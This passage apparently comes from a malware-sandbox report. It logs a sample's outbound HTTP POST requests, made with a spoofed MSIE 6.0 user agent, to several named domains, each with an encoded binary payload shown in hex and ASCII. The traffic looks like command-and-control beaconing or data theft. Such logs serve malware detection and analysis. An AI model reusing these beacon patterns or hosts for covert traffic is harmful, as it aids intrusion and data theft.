77 6d 46 46 6f 42 52 57 2b 54 6e 78 56 41 47 4e 75 41 3d 3d Data Ascii: RHd6gYfYpw2ljVaRtrxp81Ccdht9K3Jaq2w78r6SOWtX3nq1I/k9jwVkqvXtLkoypdMiFDt5julGcR6rEb1VPZXLEB4sS7WPsGnTXt+MYuzGZXDEsnntYoNK0AwdxdNRF79w8cslfiMMmXpl0JvJghFta3el8+30d3Ck4KgmXZvifvFKNgS6kLPbQCeKbsk+Fg5QnRtFMHiSsdFkowBjoQeLC0lmp7lG3AuzVZk0PGY85/z9MC8lrhHTPTCxtrRlq8rw4N5bO+ek5MoQnMecCKbaPvuyat8T/Vusb90EApl6AYWH38nLoD+4UfKkvOGTxgnzkNO/nabNShAsMp8kl+DGAcAFbtMkV2XIML94CdyZ4d3H0lj86/VOCob7o19fm1Lln1zpKGg7fA6XL9sQhkG8sUlW0TzedkcWbS07X1yqfXPgrQHit6NEUJ4VKbS2usGlH9zfGtfoPxs1yyM7KCaH5G7zZNBlQmPVgcO8hTtscMXZRbgD4+spV4CyFrFk5SvKwmFFoBRW+TnxVAGNuA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 58 74 59 38 43 4d 5a 35 7a 51 30 4d 53 66 6a 48 34 51 61 35 73 75 6d 32 43 4b 6b 6d 2b 35 7a 30 57 6c 4c 53 61 57 56 34 43 53 71 77 68 43 54 4d 68 6d 55 64 6d 65 2b 47 69 63 65 55 67 67 47 43 73 67 30 6a 62 44 34 2b 56 35 4c 67 2b 55 43 43 51 6c 30 51 56 67 47 79 48 46 79 6a 48 61 55 53 65 76 30 48 4b 4e 75 31 6f 47 65 6a 2f 4f 45 33 33 78 34 77 36 57 70 58 4b 66 49 59 73 59 4c 6c 65 35 47 30 35 66 48 42 66 4f 53 6a 36 55 6c 62 7a 42 4f 38 54 71 64 2b 53 6e 55 32 7a 77 61 48 35 76 6b 48 52 4c 79 71 5a 4a 51 53 72 57 67 63 69 34 7a 6b 53 4a 63 7a 74 2f 4c 4b 4d 49 54 58 63 4d 6e 43 4b 4d 4e 73 72 50 57 66 48 33 54 63 38 41 70 74 68 43 2f 38 4f 38 53 4f 7a 45 57 4e 77 6d 30 70 37 2b 50 41 6a 37 66 73 41 6f 67 48 45 62 71 49 32 2f 35 46 55 41 43 73 4a 76 75 62 30 30 79 31 37 30 73 65 52 7a 68 4d 32 74 44 57 2f 4c 2f 31 66 70 48 54 53 77 5a 71 44 6c 51 6d 33 56 46 30 6a 5a 5a 72 56 4b 34 39 2f 6b 2f 71 52 4b 5a 55 6d 68 55 47 72 4c 47 4a 47 78 48 31 58 55 42 4f 44 6d 65 61 74 6b 67 6c 4a 55 35 6b 53 2b 66 44 6b 51 33 38 43 76 51 47 34 2b 78 34 32 46 43 44 71 62 70 73 70 6f 2f 46 33 62 78 30 36 6d 57 4f 43 45 68 55 69 66 35 51 48 4b 7a 44 68 4d 2b 44 2b 71 4c 6b 78 34 78 47 48 31 6c 68 6a 4c 6f 37 43 71 57 6e 76 62 31 74 65 32 53 61 42 73 6d 6b 30 32 6c 38 52 6c 32 48 6a 5a 62 43 75 4c 4e 41 45 55 47 41 53 33 59 79 78 32 61 41 7a 4b 49 4c 67 78 56 32 70 4a 49 64 6a 42 2b 56 74 71 4a 58 34 6a 4d 2f 32 72 64 4c 7a 59 73 55 45 44 58 58 37 69 79 4f 59 6e 6e 50 38 39 73 33 57 6f 51 6f 53 34 30 63 6c 38 77 42 63 39 56 62 43 31 49 6b 58 37 43 46 49 7a 67 74 6f 4c 5a 31 4c 62 4f 38 41 7a 77 45 7a 62 39 59 Data Ascii: XtY8CMZ5zQ0MSfjH4Qa5sum2CKkm+5z0WlLSaWV4CSqwhCTMhmUdme+GiceUggGCsg0jbD4+V5Lg+UCCQl0QVgGyHFyjHaUSev0HKNu1oGej/OE33x4w6WpXKfIYsYLle5G05fHBfOSj6UlbzBO8Tqd+SnU2zwaH5vkHRLyqZJQSrWgci4zkSJczt/LKMITXcMnCKMNsrPWfH3Tc8ApthC/8O8SOzEWNwm0p7+PAj7fsAogHEbqI2/5FUACsJvub00y170seRzhM2tDW/L/1fpHTSwZqDlQm3VF0jZZrVK49/k/qRKZUmhUGrLGJGxH1XUBODmeatkglJU5kS+fDkQ38CvQG4+x42FCDqbpspo/F3bx06mWOCEhUif5QHKzDhM+D+qLkx4xGH1lhjLo7CqWnvb1te2SaBsmk02l8Rl2HjZbCuLNAEUGAS3Yyx2aAzKILgxV2pJIdjB+VtqJX4jM/2rdLzYsUEDXX7iyOYnnP89s3WoQoS40cl8wBc9VbC1IkX7CFIzgtoLZ1LbO8AzwEzb9Y
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 572User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.holleman.usCache-Control: no-cacheData Raw: 4b 35 53 4a 31 52 53 45 77 77 32 76 76 6c 6b 33 37 36 44 77 75 32 65 49 4f 56 47 4d 39 6e 58 4e 69 49 70 5a 42 46 58 6c 67 34 6b 41 4d 46 6c 58 66 6e 31 70 51 55 4a 47 36 67 4c 37 52 33 4e 59 54 7a 63 49 68 52 45 2f 78 7a 36 55 77 66 49 47 69 30 68 44 47 74 34 74 34 54 61 73 55 31 72 4b 4d 7a 62 75 6e 6b 58 62 53 75 57 71 51 54 7a 6a 41 33 46 41 37 66 74 38 58 4b 45 68 4b 71 65 66 4b 58 54 76 7a 63 52 74 46 65 39 48 47 6d 4e 58 57 5a 51 58 63 6c 6e 4a 75 56 6a 35 69 6a 6a 4a 61 39 2b 46 51 64 33 77 43 39 34 32 55 35 74 2b 59 71 32 41 6c 42 6f 6d 74 42 6f 72 7a 48 38 5a 44 2b 58 69 6b 72 47 59 2b 6c 6c 34 71 4d 6b 75 55 44 42 59 56 6d 36 6e 66 68 72 46 34 5a 4e 42 61 46 50 62 4c 6e 69 5a 62 58 4d 50 6f 38 44 78 57 70 6e 38 32 65 65 74 68 4e 2f 2f 32 4b 6d 34 52 4e 50 76 30 76 4e 47 65 53 4a 4b 5a 6c 55 38 68 30 4f 59 58 4c 62 2f 57 45 64 32 39 67 59 36 31 39 36 66 6a 77 42 49 6b 51 78 4d 67 6d 55 70 4e 33 51 69 5a 76 64 41 2b 73 70 4a 6d 4f 44 49 59 72 76 4b 43 49 2f 45 46 46 76 4e 6c 56 36 44 62 52 45 31 79 6f 6e 37 72 66 74 33 69 74 75 76 4e 6c 31 74 42 7a 37 5a 78 54 78 76 50 61 67 4b 39 70 34 36 76 57 4f 45 70 54 6d 52 73 73 75 2f 4f 44 2b 49 77 6f 53 6c 75 50 68 50 50 5a 4a 79 43 76 7a 35 33 61 33 79 30 68 2b 63 63 7a 6f 53 6a 70 39 74 31 45 54 75 71 72 72 41 6b 43 61 62 41 2b 2b 36 70 62 64 33 42 42 42 32 56 56 65 47 55 51 2b 33 55 56 77 44 56 5a 6e 74 72 39 59 4b 4f 4b 34 4e 31 62 37 54 6c 38 69 32 61 7a 49 76 79 33 55 62 6b 46 5a 78 32 75 49 77 70 56 4d 61 6f 2f 44 71 6f 56 55 71 49 44 54 78 45 61 6e 6a 64 56 46 7a 4e 30 54 75 72 79 43 32 6d 34 67 39 64 46 46 42 63 32 48 71 32 73 43 65 79 53 73 4a 6c 6f 76 39 32 2b 58 50 4f 6f 49 78 43 4c 66 59 47 73 76 74 74 55 32 51 6c 74 6b 3d Data Ascii: K5SJ1RSEww2vvlk376Dwu2eIOVGM9nXNiIpZBFXlg4kAMFlXfn1pQUJG6gL7R3NYTzcIhRE/xz6UwfIGi0hDGt4t4TasU1rKMzbunkXbSuWqQTzjA3FA7ft8XKEhKqefKXTvzcRtFe9HGmNXWZQXclnJuVj5ijjJa9+FQd3wC942U5t+Yq2AlBomtBorzH8ZD+XikrGY+ll4qMkuUDBYVm6nfhrF4ZNBaFPbLniZbXMPo8DxWpn82eethN//2Km4RNPv0vNGeSJKZlU8h0OYXLb/WEd29gY6196fjwBIkQxMgmUpN3QiZvdA+spJmODIYrvKCI/EFFvNlV6DbRE1yon7rft3ituvNl1tBz7ZxTxvPagK9p46vWOEpTmRssu/OD+IwoSluPhPPZJyCvz53a3y0h+cczoSjp9t1ETuqrrAkCabA++6pbd3BBB2VVeGUQ+3UVwDVZntr9YKOK4N1b7Tl8i2azIvy3UbkFZx2uIwpVMao/DqoVUqIDTxEanjdVFzN0TuryC2m4g9dFFBc2Hq2sCeySsJlov92+XPOoIxCLfYGsvttU2Qltk=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.nunomira.comCache-Control: no-cacheData Raw: 58 74 59 38 43 4d 5a 35 7a 51 30 4d 53 66 6a 48 34 51 61 35 73 75 6d 32 43 4b 6b 6d 2b 35 7a 30 57 6c 4c 53 61 57 56 34 43 53 71 77 68 43 54 4d 68 6d 55 64 6d 65 2b 47 69 63 65 55 67 67 47 43 73 67 30 6a 62 44 34 2b 56 35 4c 67 2b 55 43 43 51 6c 30 51 56 67 47 79 48 46 79 6a 48 61 55 53 65 76 30 48 4b 4e 75 31 6f 47 65 6a 2f 4f 45 33 33 78 34 77 36 57 70 58 4b 66 49 59 73 59 4c 6c 65 35 47 30 35 66 48 42 66 4f 53 6a 36 55 6c 62 7a 42 4f 38 54 71 64 2b 53 6e 55 32 7a 77 61 48 35 76 6b 48 52 4c 79 71 5a 4a 51 53 72 57 67 63 69 34 7a 6b 53 4a 63 7a 74 2f 4c 4b 4d 49 54 58 63 4d 6e 43 4b 4d 4e 73 72 50 57 66 48 33 54 63 38 41 70 74 68 43 2f 38 4f 38 53 4f 7a 45 57 4e 77 6d 30 70 37 2b 50 41 6a 37 66 73 41 6f 67 48 45 62 71 49 32 2f 35 46 55 41 43 73 4a 76 75 62 30 30 79 31 37 30 73 65 52 7a 68 4d 32 74 44 57 2f 4c 2f 31 66 70 48 54 53 77 5a 71 44 6c 51 6d 33 56 46 30 6a 5a 5a 72 56 4b 34 39 2f 6b 2f 71 52 4b 5a 55 6d 68 55 47 72 4c 47 4a 47 78 48 31 58 55 42 4f 44 6d 65 61 74 6b 67 6c 4a 55 35 6b 53 2b 66 44 6b 51 33 38 43 76 51 47 34 2b 78 34 32 46 43 44 71 62 70 73 70 6f 2f 46 33 62 78 30 36 6d 57 4f 43 45 68 55 69 66 35 51 48 4b 7a 44 68 4d 2b 44 2b 71 4c 6b 78 34 78 47 48 31 6c 68 6a 4c 6f 37 43 71 57 6e 76 62 31 74 65 32 53 61 42 73 6d 6b 30 32 6c 38 52 6c 32 48 6a 5a 62 43 75 4c 4e 41 45 55 47 41 53 33 59 79 78 32 61 41 7a 4b 49 4c 67 78 56 32 70 4a 49 64 6a 42 2b 56 74 71 4a 58 34 6a 4d 2f 32 72 64 4c 7a 59 73 55 45 44 58 58 37 69 79 4f 59 6e 6e 50 38 39 73 33 57 6f 51 6f 53 34 30 63 6c 38 77 42 63 39 56 62 43 31 49 6b 58 37 43 46 49 7a 67 74 6f 4c 5a 31 4c 62 4f 38 41 7a 77 45 7a 62 39 59 Data Ascii: XtY8CMZ5zQ0MSfjH4Qa5sum2CKkm+5z0WlLSaWV4CSqwhCTMhmUdme+GiceUggGCsg0jbD4+V5Lg+UCCQl0QVgGyHFyjHaUSev0HKNu1oGej/OE33x4w6WpXKfIYsYLle5G05fHBfOSj6UlbzBO8Tqd+SnU2zwaH5vkHRLyqZJQSrWgci4zkSJczt/LKMITXcMnCKMNsrPWfH3Tc8ApthC/8O8SOzEWNwm0p7+PAj7fsAogHEbqI2/5FUACsJvub00y170seRzhM2tDW/L/1fpHTSwZqDlQm3VF0jZZrVK49/k/qRKZUmhUGrLGJGxH1XUBODmeatkglJU5kS+fDkQ38CvQG4+x42FCDqbpspo/F3bx06mWOCEhUif5QHKzDhM+D+qLkx4xGH1lhjLo7CqWnvb1te2SaBsmk02l8Rl2HjZbCuLNAEUGAS3Yyx2aAzKILgxV2pJIdjB+VtqJX4jM/2rdLzYsUEDXX7iyOYnnP89s3WoQoS40cl8wBc9VbC1IkX7CFIzgtoLZ1LbO8AzwEzb9Y
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fcwcvt.orgCache-Control: no-cacheData Raw: 7a 4a 50 6c 42 56 46 6d 7a 51 30 6c 6f 4d 2f 76 38 47 75 4b 78 4b 72 53 5a 64 30 50 78 6e 46 73 46 66 72 73 43 50 64 43 7a 35 61 57 30 66 34 2f 4d 73 70 4f 69 76 70 36 36 54 34 62 68 4b 68 62 73 58 77 32 52 50 52 6e 61 37 61 48 42 6a 64 5a 51 76 63 68 59 53 4b 4f 65 4b 4c 71 49 43 42 6b 56 76 64 6e 6f 55 4a 50 6a 2f 4b 78 30 5a 7a 62 51 41 55 72 78 6a 4b 6d 69 35 34 6c 2b 37 55 50 49 2f 55 54 74 54 75 51 67 37 59 30 33 65 68 4c 59 35 4a 65 38 77 7a 6e 74 68 66 2f 6e 4b 34 44 48 65 64 54 69 67 63 36 72 59 57 36 6a 30 57 54 4b 51 68 76 56 64 4c 31 50 2b 4a 31 33 56 64 53 6f 78 31 47 73 63 75 74 4e 2f 39 4f 63 6f 4e 4a 58 31 46 6e 35 72 66 4d 34 62 53 69 72 33 55 2b 79 59 47 2b 32 53 71 7a 50 37 4c 6f 74 68 31 67 2b 2b 76 37 53 73 46 74 77 5a 33 6d 68 32 47 4d 77 69 79 74 5a 45 62 67 30 72 6d 6f 42 50 2f 76 48 4f 59 53 6d 48 32 58 64 70 72 61 78 61 46 62 72 4b 47 41 32 54 4a 72 4e 38 77 77 64 39 69 74 47 37 62 39 6c 4e 41 2f 2b 73 7a 4d 4d 42 64 4e 56 57 69 58 36 66 45 70 51 70 55 72 6b 34 34 33 33 73 69 39 6b 4e 71 56 4c 69 4f 4d 43 70 47 2b 36 47 68 6d 2f 6a 47 6b 42 4e 38 67 35 4c 57 73 2f 39 48 6f 6c 32 4d 66 37 54 4c 65 50 65 71 78 4f 77 2f 76 42 6d 64 2f 50 76 73 51 41 31 59 32 47 52 77 49 70 51 65 72 32 73 4d 48 76 5a 6c 4c 75 4a 47 53 33 6d 73 32 4d 67 66 39 53 4d 54 75 56 36 6c 4e 4a 74 53 2f 4e 75 61 64 64 74 51 33 49 54 51 37 46 50 37 69 62 4a 55 6d 68 76 79 55 48 58 45 52 4e 76 48 6a 6c 31 6e 6e 38 55 70 74 53 52 4a 30 42 42 53 73 6f 2f 45 4a 6f 78 63 61 30 34 63 72 2b 74 5a 38 5a 69 7a 43 44 4e 38 43 32 6e 6d 53 30 70 77 32 7a 4b 50 55 50 33 4b 74 6d 37 4d 4f 4e 51 2b 77 32 4c 6c 78 79 74 4e 52 36 30 55 76 36 79 51 36 68 76 75 59 49 4e 7a 6a 70 2b 65 67 31 74 62 36 62 58 59 47 6e 76 62 61 36 5a 67 64 6b 51 49 56 7a 62 77 3d Data Ascii: zJPlBVFmzQ0loM/v8GuKxKrSZd0PxnFsFfrsCPdCz5aW0f4/MspOivp66T4bhKhbsXw2RPRna7aHBjdZQvchYSKOeKLqICBkVvdnoUJPj/Kx0ZzbQAUrxjKmi54l+7UPI/UTtTuQg7Y03ehLY5Je8wznthf/nK4DHedTigc6rYW6j0WTKQhvVdL1P+J13VdSox1GscutN/9OcoNJX1Fn5rfM4bSir3U+yYG+2SqzP7Loth1g++v7SsFtwZ3mh2GMwiytZEbg0rmoBP/vHOYSmH2XdpraxaFbrKGA2TJrN8wwd9itG7b9lNA/+szMMBdNVWiX6fEpQpUrk4433si9kNqVLiOMCpG+6Ghm/jGkBN8g5LWs/9Hol2Mf7TLePeqxOw/vBmd/PvsQA1Y2GRwIpQer2sMHvZlLuJGS3ms2Mgf9SMTuV6lNJtS/NuaddtQ3ITQ7FP7ibJUmhvyUHXERNvHjl1nn8UptSRJ0BBSso/EJoxca04cr+tZ8ZizCDN8C2nmS0pw2zKPUP3Ktm7MONQ+w2LlxytNR60Uv6yQ6hvuYINzjp+eg1tb6bXYGnvba6ZgdkQIVzbw=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pcgrate.comCache-Control: no-cacheData Raw: 35 31 72 4b 68 49 44 56 32 51 30 42 5a 32 42 68 55 38 6f 50 6c 62 4d 59 32 4f 68 6f 55 6d 33 46 74 47 53 42 66 48 58 54 53 79 6e 6b 6e 64 4f 36 4e 4b 61 6a 2b 55 45 56 44 31 59 4c 68 53 4d 57 6f 4d 2f 72 45 4d 55 54 2f 65 34 57 2f 32 35 74 6e 6d 4f 4f 35 2b 7a 61 4b 45 49 59 36 57 30 59 59 46 4c 34 53 66 4a 49 4d 77 59 61 33 6b 39 61 72 78 6e 66 7a 44 76 2f 79 4d 64 2b 31 49 37 42 67 39 4f 38 4e 37 78 41 55 75 2f 65 71 44 34 4a 6f 70 55 47 42 4c 50 33 4c 30 75 78 34 62 4f 76 74 73 4d 30 6c 55 37 35 62 2f 49 38 44 65 6d 6c 58 70 42 4a 6c 49 46 55 76 52 72 48 47 4a 52 55 5a 6b 6f 4e 4e 6e 78 6f 2b 6d 42 79 79 6e 5a 39 32 5a 55 69 45 30 78 52 69 4e 6e 7a 64 43 2f 6d 76 59 42 51 46 67 31 33 69 70 46 77 6c 4e 42 68 39 34 68 78 5a 57 4f 37 34 4f 30 51 6b 65 36 6c 47 79 6c 53 79 2f 5a 58 54 66 72 59 31 45 65 38 68 6a 65 58 6b 64 47 67 51 6a 41 4b 42 4b 56 36 56 30 6a 6f 72 48 74 4c 45 36 32 6e 42 72 66 61 69 50 64 69 4e 67 64 43 2f 4a 38 30 4c 6e 6f 6b 59 34 31 47 30 32 76 66 49 42 42 72 34 70 39 74 4a 62 2f 64 6a 63 4c 62 76 2f 53 6a 46 5a 61 78 72 64 2f 41 69 46 67 75 44 33 32 6d 71 30 62 69 65 78 4a 4f 64 47 4f 42 67 2f 6b 63 74 43 6d 51 51 5a 71 78 41 47 56 62 6b 34 5a 53 68 58 37 43 65 63 4b 77 70 45 39 67 6a 45 4c 58 67 73 6e 39 4e 78 67 6b 4b 6a 48 72 2b 47 7a 59 71 4b 6e 6b 74 33 47 47 6b 74 31 31 48 51 7a 6f 55 58 2b 50 4d 61 77 4a 54 32 43 58 38 76 32 33 69 2f 38 46 42 73 38 6f 70 4c 68 54 72 31 64 74 43 50 57 69 52 65 32 36 6c 51 34 64 30 64 6e 65 32 70 35 46 6a 71 72 4e 79 61 78 6c 64 63 7a 52 57 41 55 45 61 4d 30 67 45 50 68 32 64 61 30 4e 30 2b 44 59 56 4c 76 59 73 56 6a 63 47 50 65 58 67 30 36 71 64 79 4c 66 57 41 3d 3d Data Ascii: 51rKhIDV2Q0BZ2BhU8oPlbMY2OhoUm3FtGSBfHXTSynkndO6NKaj+UEVD1YLhSMWoM/rEMUT/e4W/25tnmOO5+zaKEIY6W0YYFL4SfJIMwYa3k9arxnfzDv/yMd+1I7Bg9O8N7xAUu/eqD4JopUGBLP3L0ux4bOvtsM0lU75b/I8DemlXpBJlIFUvRrHGJRUZkoNNnxo+mByynZ92ZUiE0xRiNnzdC/mvYBQFg13ipFwlNBh94hxZWO74O0Qke6lGylSy/ZXTfrY1Ee8hjeXkdGgQjAKBKV6V0jorHtLE62nBrfaiPdiNgdC/J80LnokY41G02vfIBBr4p9tJb/djcLbv/SjFZaxrd/AiFguD32mq0biexJOdGOBg/kctCmQQZqxAGVbk4ZShX7CecKwpE9gjELXgsn9NxgkKjHr+GzYqKnkt3GGkt11HQzoUX+PMawJT2CX8v23i/8FBs8opLhTr1dtCPWiRe26lQ4d0dne2p5FjqrNyaxldczRWAUEaM0gEPh2da0N0+DYVLvYsVjcGPeXg06qdyLfWA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.cokocoko.comCache-Control: no-cacheData Raw: 52 48 64 36 67 59 66 59 70 77 32 6c 6a 56 61 52 74 72 78 70 38 31 43 63 64 68 74 39 4b 33 4a 61 71 32 77 37 38 72 36 53 4f 57 74 58 33 6e 71 31 49 2f 6b 39 6a 77 56 6b 71 76 58 74 4c 6b 6f 79 70 64 4d 69 46 44 74 35 6a 75 6c 47 63 52 36 72 45 62 31 56 50 5a 58 4c 45 42 34 73 53 37 57 50 73 47 6e 54 58 74 2b 4d 59 75 7a 47 5a 58 44 45 73 6e 6e 74 59 6f 4e 4b 30 41 77 64 78 64 4e 52 46 37 39 77 38 63 73 6c 66 69 4d 4d 6d 58 70 6c 30 4a 76 4a 67 68 46 74 61 33 65 6c 38 2b 33 30 64 33 43 6b 34 4b 67 6d 58 5a 76 69 66 76 46 4b 4e 67 53 36 6b 4c 50 62 51 43 65 4b 62 73 6b 2b 46 67 35 51 6e 52 74 46 4d 48 69 53 73 64 46 6b 6f 77 42 6a 6f 51 65 4c 43 30 6c 6d 70 37 6c 47 33 41 75 7a 56 5a 6b 30 50 47 59 38 35 2f 7a 39 4d 43 38 6c 72 68 48 54 50 54 43 78 74 72 52 6c 71 38 72 77 34 4e 35 62 4f 2b 65 6b 35 4d 6f 51 6e 4d 65 63 43 4b 62 61 50 76 75 79 61 74 38 54 2f 56 75 73 62 39 30 45 41 70 6c 36 41 59 57 48 33 38 6e 4c 6f 44 2b 34 55 66 4b 6b 76 4f 47 54 78 67 6e 7a 6b 4e 4f 2f 6e 61 62 4e 53 68 41 73 4d 70 38 6b 6c 2b 44 47 41 63 41 46 62 74 4d 6b 56 32 58 49 4d 4c 39 34 43 64 79 5a 34 64 33 48 30 6c 6a 38 36 2f 56 4f 43 6f 62 37 6f 31 39 66 6d 31 4c 6c 6e 31 7a 70 4b 47 67 37 66 41 36 58 4c 39 73 51 68 6b 47 38 73 55 6c 57 30 54 7a 65 64 6b 63 57 62 53 30 37 58 31 79 71 66 58 50 67 72 51 48 69 74 36 4e 45 55 4a 34 56 4b 62 53 32 75 73 47 6c 48 39 7a 66 47 74 66 6f 50 78 73 31 79 79 4d 37 4b 43 61 48 35 47 37 7a 5a 4e 42 6c 51 6d 50 56 67 63 4f 38 68 54 74 73 63 4d 58 5a 52 62 67 44 34 2b 73 70 56 34 43 79 46 72 46 6b 35 53 76 4b 77 6d 46 46 6f 42 52 57 2b 54 6e 78 56 41 47 4e 75 41 3d 3d Data Ascii: RHd6gYfYpw2ljVaRtrxp81Ccdht9K3Jaq2w78r6SOWtX3nq1I/k9jwVkqvXtLkoypdMiFDt5julGcR6rEb1VPZXLEB4sS7WPsGnTXt+MYuzGZXDEsnntYoNK0AwdxdNRF79w8cslfiMMmXpl0JvJghFta3el8+30d3Ck4KgmXZvifvFKNgS6kLPbQCeKbsk+Fg5QnRtFMHiSsdFkowBjoQeLC0lmp7lG3AuzVZk0PGY85/z9MC8lrhHTPTCxtrRlq8rw4N5bO+ek5MoQnMecCKbaPvuyat8T/Vusb90EApl6AYWH38nLoD+4UfKkvOGTxgnzkNO/nabNShAsMp8kl+DGAcAFbtMkV2XIML94CdyZ4d3H0lj86/VOCob7o19fm1Lln1zpKGg7fA6XL9sQhkG8sUlW0TzedkcWbS07X1yqfXPgrQHit6NEUJ4VKbS2usGlH9zfGtfoPxs1yyM7KCaH5G7zZNBlQmPVgcO8hTtscMXZRbgD4+spV4CyFrFk5SvKwmFFoBRW+TnxVAGNuA==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 64 49 6b 53 44 73 46 4b 33 67 33 76 62 43 44 75 6f 4b 56 61 7a 35 72 63 4a 41 4d 2f 61 79 50 54 68 58 57 4f 4f 64 76 72 55 39 6f 6a 65 49 49 68 52 6c 35 6a 35 47 4f 53 75 38 6c 65 51 6f 32 74 66 41 64 50 50 67 6a 6c 7a 69 34 51 37 71 52 50 66 61 52 31 4f 76 46 7a 31 72 43 6b 70 35 62 7a 76 6f 4b 7a 6f 72 79 37 79 62 50 41 4d 4c 6a 4c 33 72 75 76 63 73 73 54 68 7a 69 31 52 68 57 79 44 45 35 70 51 35 66 76 6b 6c 31 4e 4d 4c 2b 44 58 43 33 4f 39 69 4f 38 65 52 4e 6c 72 35 78 31 73 77 45 41 77 7a 79 75 58 30 2b 57 5a 7a 4a 41 68 4b 35 45 42 48 6e 54 50 78 2b 53 49 72 56 64 4e 4a 72 30 45 46 71 62 45 32 5a 39 52 30 62 4c 6e 33 50 42 73 62 67 57 4b 41 6b 4b 76 50 42 2f 4b 78 70 39 70 61 79 50 52 37 61 7a 63 38 54 4d 42 68 2f 31 64 4d 49 77 6d 77 56 41 63 30 31 53 69 4c 6b 66 48 72 35 77 58 65 41 66 4b 37 58 6c 6b 42 57 48 4f 6a 73 43 4e 63 71 42 57 70 65 63 65 36 42 4f 50 54 35 45 4e 79 54 30 42 38 45 72 2b 49 59 2b 56 65 33 2b 67 63 6f 5a 65 30 6e 44 35 7a 66 44 46 30 62 46 76 48 57 56 5a 64 4e 63 4a 59 5a 63 55 63 52 43 41 78 5a 6a 6f 54 45 75 73 50 6d 36 32 41 68 70 41 4f 52 39 65 70 2b 78 43 6a 63 6b 33 73 73 36 51 59 31 48 57 5a 4a 4b 4e 48 4a 47 57 49 34 6c 33 43 42 6a 6a 61 63 61 62 51 41 56 6a 62 35 30 47 4f 4b 69 5a 4a 71 6e 51 51 49 44 52 75 62 68 50 61 38 4f 57 2f 4c 73 6f 6d 30 4d 4d 34 6c 42 6c 4e 6f 42 2b 32 42 58 39 6d 67 52 35 71 53 36 36 61 2b 50 2b 63 48 63 59 4a 59 30 57 4b 64 6c 56 66 63 68 42 6b 7a 2f 4b 31 49 69 73 54 55 50 2f 6f 50 30 2f 37 79 51 32 75 4e 52 4d 55 45 65 4e 4f 7a 4c 4c 73 78 2b 4e 46 73 46 33 59 5a 73 74 4e 41 6c 7a 36 74 32 42 62 39 42 2b 48 4e 48 46 6b 38 78 72 63 37 35 52 44 5a 30 53 31 76 4e 33 35 4b 4a 38 72 49 79 Data Ascii: dIkSDsFK3g3vbCDuoKVaz5rcJAM/ayPThXWOOdvrU9ojeIIhRl5j5GOSu8leQo2tfAdPPgjlzi4Q7qRPfaR1OvFz1rCkp5bzvoKzory7ybPAMLjL3ruvcssThzi1RhWyDE5pQ5fvkl1NML+DXC3O9iO8eRNlr5x1swEAwzyuX0+WZzJAhK5EBHnTPx+SIrVdNJr0EFqbE2Z9R0bLn3PBsbgWKAkKvPB/Kxp9payPR7azc8TMBh/1dMIwmwVAc01SiLkfHr5wXeAfK7XlkBWHOjsCNcqBWpece6BOPT5ENyT0B8Er+IY+Ve3+gcoZe0nD5zfDF0bFvHWVZdNcJYZcUcRCAxZjoTEusPm62AhpAOR9ep+xCjck3ss6QY1HWZJKNHJGWI4l3CBjjacabQAVjb50GOKiZJqnQQIDRubhPa8OW/Lsom0MM4lBlNoB+2BX9mgR5qS66a+P+cHcYJY0WKdlVfchBkz/K1IisTUP/oP0/7yQ2uNRMUEeNOzLLsx+NFsF3YZstNAlz6t2Bb9B+HNHFk8xrc75RDZ0S1vN35KJ8rIy
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.speelhal.netCache-Control: no-cacheData Raw: 32 74 30 4c 4d 4c 45 46 38 41 30 65 59 44 73 4b 30 4d 4d 73 49 67 71 46 68 2b 4c 76 57 44 4c 74 64 65 65 34 44 6a 65 64 76 77 64 4b 6b 36 6e 48 4d 58 47 75 5a 69 5a 4b 6a 64 66 33 39 59 68 42 75 2f 6d 57 31 38 49 65 6e 54 56 62 74 5a 41 66 37 76 68 58 41 4b 4d 32 6c 37 4b 45 6d 6a 77 6f 43 4f 46 61 71 79 6c 61 7a 70 59 62 38 30 5a 76 39 6a 5a 77 38 44 63 73 56 51 66 32 46 43 4b 39 4a 51 30 6a 2f 49 56 66 6c 47 50 6a 35 7a 48 71 30 37 62 35 6c 4b 4c 50 74 59 48 4c 6e 66 5a 37 35 64 45 57 4d 78 48 54 54 4b 39 49 6e 6d 4d 79 39 68 63 38 41 62 4d 6c 6c 61 4e 66 6e 4e 4c 42 2b 35 66 63 36 30 78 2b 31 6d 32 65 36 77 56 36 4a 78 71 69 36 50 6a 4a 67 62 4f 4d 45 43 77 52 66 55 6f 76 4c 43 38 47 72 72 6a 2b 59 32 75 64 4a 70 34 41 59 71 31 30 49 2f 58 6f 2b 6f 75 65 51 62 68 72 53 37 73 4e 70 57 6e 54 49 76 76 76 53 35 47 73 44 4b 68 56 4c 66 45 53 5a 33 63 62 56 53 52 55 36 75 52 77 36 43 65 39 62 68 31 2f 4e 6e 48 35 66 70 72 66 67 66 4d 4a 7a 54 37 